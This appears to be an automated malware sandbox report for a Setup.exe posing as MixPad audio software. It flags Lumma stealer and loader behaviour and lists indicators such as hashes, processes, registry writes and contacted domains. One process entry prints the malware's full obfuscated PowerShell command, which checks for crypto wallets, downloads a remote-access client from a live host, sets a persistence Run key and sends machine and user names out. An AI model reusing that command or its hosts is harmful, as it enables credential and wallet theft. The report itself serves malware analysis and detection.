File name:

Setup.exe

Full analysis: https://app.any.run/tasks/eb80fd15-fe98-4e9b-ab45-db606afef8e5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 23, 2024, 11:06:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
stealer
pastebin
loader
autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

9F255C59CB7291F7170E4418A649BD8E

SHA1:

61FF59F20F18BD99847DEF7B88B3F8350D778DE3

SHA256:

22FBCD9BBA70FE43CCD1F1CA55B79C1D74238B7A3CACBFFAD165FC07E70D832B

SSDEEP:

98304:hdsv2DOl9kIq/tBgdD07yvaY5M0BUuc17BCxrvUMEvNa7bKPisuZLeUs7H3tdupn:ROY0hN+FIGI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5000)
    • LUMMA has been detected (SURICATA)

      • msiexec.exe (PID: 3436)
    • Stealers network behavior

      • msiexec.exe (PID: 3436)
    • Actions looks like stealing of personal data

      • msiexec.exe (PID: 3436)
    • Steals credentials from Web Browsers

      • msiexec.exe (PID: 3436)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5496)
      • msiexec.exe (PID: 3436)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5400)
      • powershell.exe (PID: 5496)
      • powershell.exe (PID: 4980)
    • LUMMA has been detected (YARA)

      • msiexec.exe (PID: 3436)
  • SUSPICIOUS

    • Creates file in the systems drive root

      • dllhost.exe (PID: 5000)
    • Starts application with an unusual extension

      • Setup.exe (PID: 6016)
      • msiexec.exe (PID: 3436)
    • The process executes Powershell scripts

      • msiexec.exe (PID: 3436)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 5496)
    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 3436)
      • powershell.exe (PID: 5496)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 5496)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 5496)
    • Application launched itself

      • powershell.exe (PID: 5496)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 5496)
    • Checks whether the computer is part of a domain (POWERSHELL)

      • powershell.exe (PID: 4980)
    • Starts the AutoIt3 executable file

      • msiexec.exe (PID: 3436)
  • INFO

    • Checks supported languages

      • Setup.exe (PID: 4320)
      • Setup.exe (PID: 6016)
      • more.com (PID: 4128)
      • 6GZ64C.com (PID: 5316)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 5000)
    • Reads the machine GUID from the registry

      • Setup.exe (PID: 4320)
    • Reads the computer name

      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • Setup.exe (PID: 6016)
    • Create files in a temporary directory

      • Setup.exe (PID: 6016)
      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • msiexec.exe (PID: 3436)
    • The process uses the downloaded file

      • dllhost.exe (PID: 5000)
      • powershell.exe (PID: 5400)
    • Reads the software policy settings

      • msiexec.exe (PID: 3436)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Disables trace logs

      • powershell.exe (PID: 5496)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Checks proxy server information

      • powershell.exe (PID: 5496)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4980)
    • Creates files or folders in the user directory

      • msiexec.exe (PID: 3436)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3436)
    • Reads Windows Product ID

      • 6GZ64C.com (PID: 5316)
    • Reads mouse settings

      • 6GZ64C.com (PID: 5316)
    • Reads CPU info

      • 6GZ64C.com (PID: 5316)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:11:02 01:07:45+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 4734464
InitializedDataSize: 6048256
UninitializedDataSize: -
EntryPoint: 0x468c62
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0017
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (Australian)
CharacterSet: Unicode
CompanyName: NCH Software
FileDescription: MixPad Multitrack Recording Software
FileVersion: 12.52+
ProductVersion: 12.52+
ProductName: MixPad
LegalCopyright: NCH Software
InternalName: MixPad
OriginalFileName: MixPad.exe
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
12
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start setup.exe no specs CMSTPLUA setup.exe no specs more.com no specs conhost.exe no specs #LUMMA msiexec.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs 6gz64c.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
1668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2828\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3436C:\WINDOWS\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe
more.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\dpwtrsonvrtk
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
3832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4128C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comSetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
More Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
4320"C:\Users\admin\Desktop\Setup.exe" C:\Users\admin\Desktop\Setup.exeexplorer.exe
User:
admin
Company:
NCH Software
Integrity Level:
MEDIUM
Description:
MixPad Multitrack Recording Software
Exit code:
0
Version:
12.52+
Modules
Images
c:\users\admin\desktop\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
4980"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e $ o f b w = ' h K c U : \ S o f T w A r e \ C L A S s E s \ ' ;   $ K 2 T f z = ' c : \ p R o g R A M   F i l e s \ ' ;   $ n S k F 7 = 0 ;   $ 5 8 4 f = ( g E T - w M i O B J e C T   - C l a s S   W i N 3 2 _ c O m P U T E R S y s T e m ) . p A r T O f D o m A i n ;   $ X T U 8 = ' h k c U : \ s o f T w A r e \ ' ;   $ K i r H = ' H k L M : \ s o F t w A r E \ C l A S s e s \ ' ;   $ 5 t v Z P = $ e N v : L O c A l a p p d a T a + ' \ P R O G R A m s \ ' ;   $ v j T A = @ (   $ O f b W + ' A O p P ' ;   $ o f b W + ' k e E p k E Y ' ;   $ K i r H + ' B C v A u L T ' ;   $ 5 T V Z p + ' K e e P k E y - D e s K T o P \ k e E p k E y   D e s k T o p . e X E ' ;   $ x t U 8 + ' R E A L   s e c u r I T y \ B C V A u L T ' ;   $ o F b W + ' C y P h e R o c k ' ;   $ 5 t v Z P + ' T r E z O R   S U I T E \ t r E Z O r   S U I t E . e x E ' ;   $ x t u 8 + ' m I C R O s O f t \ w I n d o W S \ c U r r E N T v e r S I o N \ u n I n s t A L l \ b i T b O x A P p ' ;   $ 5 T v Z p + ' c y p H E R o c k   C Y s Y N C \ C Y P h E r o c k   C Y S y n C . e X e ' ;   $ K 2 T f z + ' B i T b o x \ B I t b o X . E x E ' ;   $ o F b W + ' o N e K E Y - w A l L e t ' ;   $ 5 t v z P + ' k e E V O - W A L L E T \ K e E V o   L I n k . e X E ' ;   $ o F B W + ' L I q U i D n e T w o R k ' ;   $ o F B W + ' t r e Z o R S U I t E ' ;   $ k 2 t F Z + ' b l o C K S T R e a M \ B l O c K s t R e a M   G R e e N \ B L O C k s t r E A M   G r e E n . e x E ' ;   $ k I r H + ' l e d g e r l i v e ' ;   $ X t u 8 + ' b I T b O x A p p ' ;   $ K 2 t F Z + ' O n E k e Y \ o n e K E y . e x E ' ;   $ o f B w + ' k E e V O ' ;   $ K 2 T f Z + ' B C   V a U L T \ B C v A U L t . E x E ' ;   $ 5 T v z p + ' r A b B Y - d E S K T o P \ r a B b Y   d e s k t o P . E x e ' ;   $ K 2 T F Z + ' L e d g e r   L i v E \ L e D G E r   l I V e . e X e ' ;   ) ;   $ r z Q a 5 = $ V J T a . L E N G t h ;   I F   ( $ 5 8 4 F )   { $ n S K f 7 = 1 }   e l S E   {   F o R   ( $ g k X l = 0 ;   $ g k X L   - l T   $ r Z q a 5   - a N d   $ n s k F 7   - E q   0 ;   $ g K x L + + )   {   i f   ( t e s t - p a T H   $ v J t a [ $ G k x L ] )   { $ n S K F 7 = 1 } ; } ; } ;   i F   ( $ n S K F 7   - E Q   1 )   {   [ n E T . s e R v I c e P O I N T m A N a g E R ] : : s E c U R i t Y p R O t O c o L   =   [ N e t . S E c u R i t y P R o t o C o l T y P e ] : : t L S 1 2 ;   $ U 9 s O t y = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / s n o w . z i p ' ;   $ y t B d 4 S = ' D e f r a g C l i e n t ' ;   C h D I R   $ E N V : a P p d a t A ;   $ J 8 f e q x r W = G E t - C O m M A n D   S T a r T - B i t S t r a N S f e r   - E R R O R a c t I O N   S i L E N T l y c O N T I N u E ;   $ W p h b A O q W = " { 0 } \ { 1 } "   - f   $ E n V : A p p d a t A ,   $ y t B d 4 S ;   T r Y   {   N e w - i T E m   - p a T h   $ e n V : A P p D a T A   - N A M E   $ y t B d 4 S   - i T e M T Y p E   ' d i r e c t o r y ' ;   A d d - T y p e   - A S S e m b l y n A m e   S y S t e M . I O . C o M p r E s S i O N ,   s Y S T e m . i o . C O M P r e s s i o n . f i l E S Y S T e m   - e R R O R a C t I O N   S I l e n t l Y c O n T I N u E ;   $ o T v Q T m T = ( C U R l   - U r i   $ U 9 s O t y   - U s E B A S I C P A R S I n g ) . c O n T e N t ;   $ u p K 3 8 6 = n E w - O b j e c t   s Y S T e m . i O . M E M O r Y s T r E A M ;   $ u p K 3 8 6 . w r i T e ( $ o T v Q T m T ,   0 ,   $ o T v Q T m T . L E N G t H ) ;   $ u p K 3 8 6 . s E E k ( 0 ,   [ S Y S T e M . I O . s e E k o r i G i n ] : : B E G i N )   |   o u T - N u l L ;   $ b 1 s a q q Q r = n E w - o b j E c t   s Y s t e M . I O . C O m P r E s S I O n . Z I p A r c H I v E ( $ u p K 3 8 6 ,   [ s Y S t E m . I o . c o M p R E s S I o n . Z I P a R c H I v E M O D E ] : : R e a d ) ;   f O R e A C h ( $ Z e Z q s H   i n   $ b 1 s a q q Q r . e n t r I E s )   {   $ B Y u c 8 M = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ Z e Z q s H . N a M E ;   $ 6 3 Y 3 r j 5 F = $ Z e Z q s H . o p e N ( ) ;   $ F 5 Y d W 8 F = [ S y s t e m . i o . f I L E ] : : C r e a T e ( $ B Y u c 8 M ) ;   $ 6 3 Y 3 r j 5 F . C o p Y t o ( $ F 5 Y d W 8 F ) ;   $ F 5 Y d W 8 F . c L o s e ( ) ;   $ 6 3 Y 3 r j 5 F . c l o S e ( ) ; }   $ b 1 s a q q Q r . d I s P O s E ( ) ;   $ u p K 3 8 6 . D i s P o S E ( ) ;   }   c a t c h   { N e w - i T E m   - P A T H   $ E n v : a P p D A t a   - n A M e   $ y t B d 4 S   - i t e m t y p e   ' d i r e c t o r y ' ;   $ I u 4 Z n 1 = ' h t t p s : / / s n o w q u e e n . s i t e / s n o w z / ' ;   $ t I V p p k B = @ ( ' T C C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ,   ' c l i e n t 3 2 . e x e ' ,   ' n s m _ v p r o . i n i ' ,   ' n s k b f l t r . i n f ' ,   ' p c i c a p i . d l l ' ,   ' P C I C H E K . D L L ' ,   ' H T C T L 3 2 . D L L ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' N S M . L I C ' ,   ' c l i e n t 3 2 . i n i ' ,   ' P C I C L 3 2 . D L L ' ) ;   I F   ( $ J 8 f e q x r W )   {   $ t I V p p k B   |   F o r E A C H - o b j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = $ W p h b A O q W + ' \ ' + $ _ ;   S t a R t - b I t S T R A N s F e R   - s O u r C E   $ G 1 6 Q 4 a U   - D E S T I N a T i o N   $ J n s A 5 f x U ;   } ; }   e L s e   {   $ t I V p p k B   |   f O r e a c h - O B j E C t   {   $ G 1 6 Q 4 a U = $ I u 4 Z n 1 + $ _ ;   $ J n s A 5 f x U = " { 0 } \ { 1 } "   - f   $ W p h b A O q W ,   $ _ ;   $ x Q f y 4 F e s = ' b I t s a D M I n . e X E   / t r A n S f e r   X 5 y 6 Y J   / d O W n L o A D   / P R i O r I T y   N O r m a l   ' + $ G 1 6 Q 4 a U + '   ' + $ J n s A 5 f x U ;   &   $ x Q f y 4 F e s ; } ;   } ;   } ;   $ 6 a L Z w U = G e t - I t E m   $ W p h b A O q W   - f o R C e ;   $ 6 a L Z w U . A t t R I B U T e s = ' H i d d e n ' ;   C d   $ W p h b A O q W ;   $ P K a T h x v 4 = $ W p h b A O q W ,   ' c l i e n t 3 2 . e x e '   - J O i n   ' \ ' ;   N e W - I t E M p R o P e R T y   - P a t H   ' h k C u : \ S O f t w a r E \ M I C R o S O f t \ W I N D O W S \ C u r R e n T v e R S I o N \ r u n '   - n A M e   $ y t B d 4 S   - V a L U e   $ P K a T h x v 4   - p R o P E R T y t y p e   ' S t r i n g ' ;   s T a R T   C L I E n T 3 2 . E X E ;   $ 3 2 H a O = p s   c l i e n t 3 2   - e r r o r a C t i O n   s i L e N T L y C O N t I n u e ;   $ S f b 0 = " h t t p s : / / s n o w q u e e n . s i t e / s n o w s / r e c a l l i n g . p h p ? c p n m e = $ E n v : c O M p u t e r N A M E & u s n m e = $ e n V : U s E r N A m E & p a r a m = " ;   I F   ( $ 3 2 H a O . i d )   {   $ q t f C D = $ S f b 0 + ' p H q B ' ;   W g e t   $ q t f C D   - u s E B A S I C p A r S I n G ; }   e l s e   {   $ q t f C D = $ S f b 0 + ' k z h U 2 ' ;   W g e t   $ q t f C D   - U s e b a s i c p a r S i N G ; } ;   } ; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5000C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\SysWOW64\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
5316"C:\Users\admin\AppData\Roaming\6GZ64C.com" "C:\Users\admin\AppData\Roaming\QKZ2HX.csv"C:\Users\admin\AppData\Roaming\6GZ64C.commsiexec.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
HIGH
Description:
AutoIt v3 Script (Beta)
Exit code:
0
Version:
3, 3, 15, 1
Modules
Images
c:\users\admin\appdata\roaming\6gz64c.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\user32.dll
5400powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\HF28QJ06Y4TY885OYJH7SL.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
18 287
Read events
18 271
Write events
16
Delete events
0

Modification events

(PID) Process:(4320) Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\NCH Software\MixPad\Software
Operation:writeName:SVar
Value:
LLIBControloff
(PID) Process:(5000) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
1
Suspicious files
2
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
4128more.comC:\Users\admin\AppData\Local\Temp\dpwtrsonvrtk
MD5:
SHA256:
3436msiexec.exeC:\Users\admin\AppData\Roaming\QKZ2HX.csv
MD5:
SHA256:
4320Setup.exeC:\Users\admin\AppData\Local\Temp\114d9e7bimage
MD5:047000E95690F931B9FAADF4547FFD8A
SHA256:3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016Setup.exeC:\Users\admin\AppData\Local\Temp\11acdc6bimage
MD5:047000E95690F931B9FAADF4547FFD8A
SHA256:3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016Setup.exeC:\Users\admin\AppData\Local\Temp\11cb7cf5binary
MD5:8634AC2835A27ABF4B59A28E5A43EF9A
SHA256:33B81DDD408703B7059EB33193634F6A648B410945995312A6FC08CC7DD349C9
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vvvtqdw5.ot1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:BAD5A3EC3F7D4CD5EE2363B17E905324
SHA256:B7A40FBA08F044E4538557AEB35247E8A3C71EFD5FC3BAF79663490C41D6CEFB
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kc2iydey.ata.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z44eh4lq.ahs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4980powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlnpxge3.zax.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
20
TCP/UDP connections
29
DNS requests
13
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1596
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
104.20.3.235:443
https://pastebin.com/raw/erLX7UsT
unknown
text
619 b
shared
GET
200
172.67.167.196:443
https://silversky.club/4b882c8/script
unknown
text
331 b
malicious
GET
200
172.67.154.155:443
https://zasa.r2cloudmikudau8.shop/runcl.bin
unknown
executable
921 Kb
GET
200
104.21.11.197:443
https://snowqueen.site/calling.php?compName=DESKTOP-JGLLJLD
unknown
text
8.93 Kb
GET
200
104.21.6.29:443
https://zasa.r2cloudmikudau8.shop/ldr_cp_sh
unknown
executable
173 Kb
GET
200
104.21.6.29:443
https://zasa.r2cloudmikudau8.shop/clp_sh.32
unknown
binary
5.72 Mb
POST
200
188.114.96.3:443
https://mysticriver.shop/api
unknown
text
16 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1596
svchost.exe
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1596
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.48.23.194
  • 23.48.23.147
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.143
  • 23.48.23.169
  • 23.48.23.158
  • 23.48.23.180
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
mysticriver.shop
  • 188.114.97.3
  • 188.114.96.3
unknown
pastebin.com
  • 104.20.4.235
  • 104.20.3.235
  • 172.67.19.24
shared
cdn1.pixel-story.shop
unknown
silversky.club
  • 172.67.167.196
  • 104.21.58.9
malicious
zasa.r2cloudmikudau8.shop
  • 104.21.6.29
  • 172.67.154.155
unknown
snowqueen.site
  • 104.21.11.197
  • 172.67.150.60
unknown

Threats

PID
Process
Class
Message
3436
msiexec.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
No debug info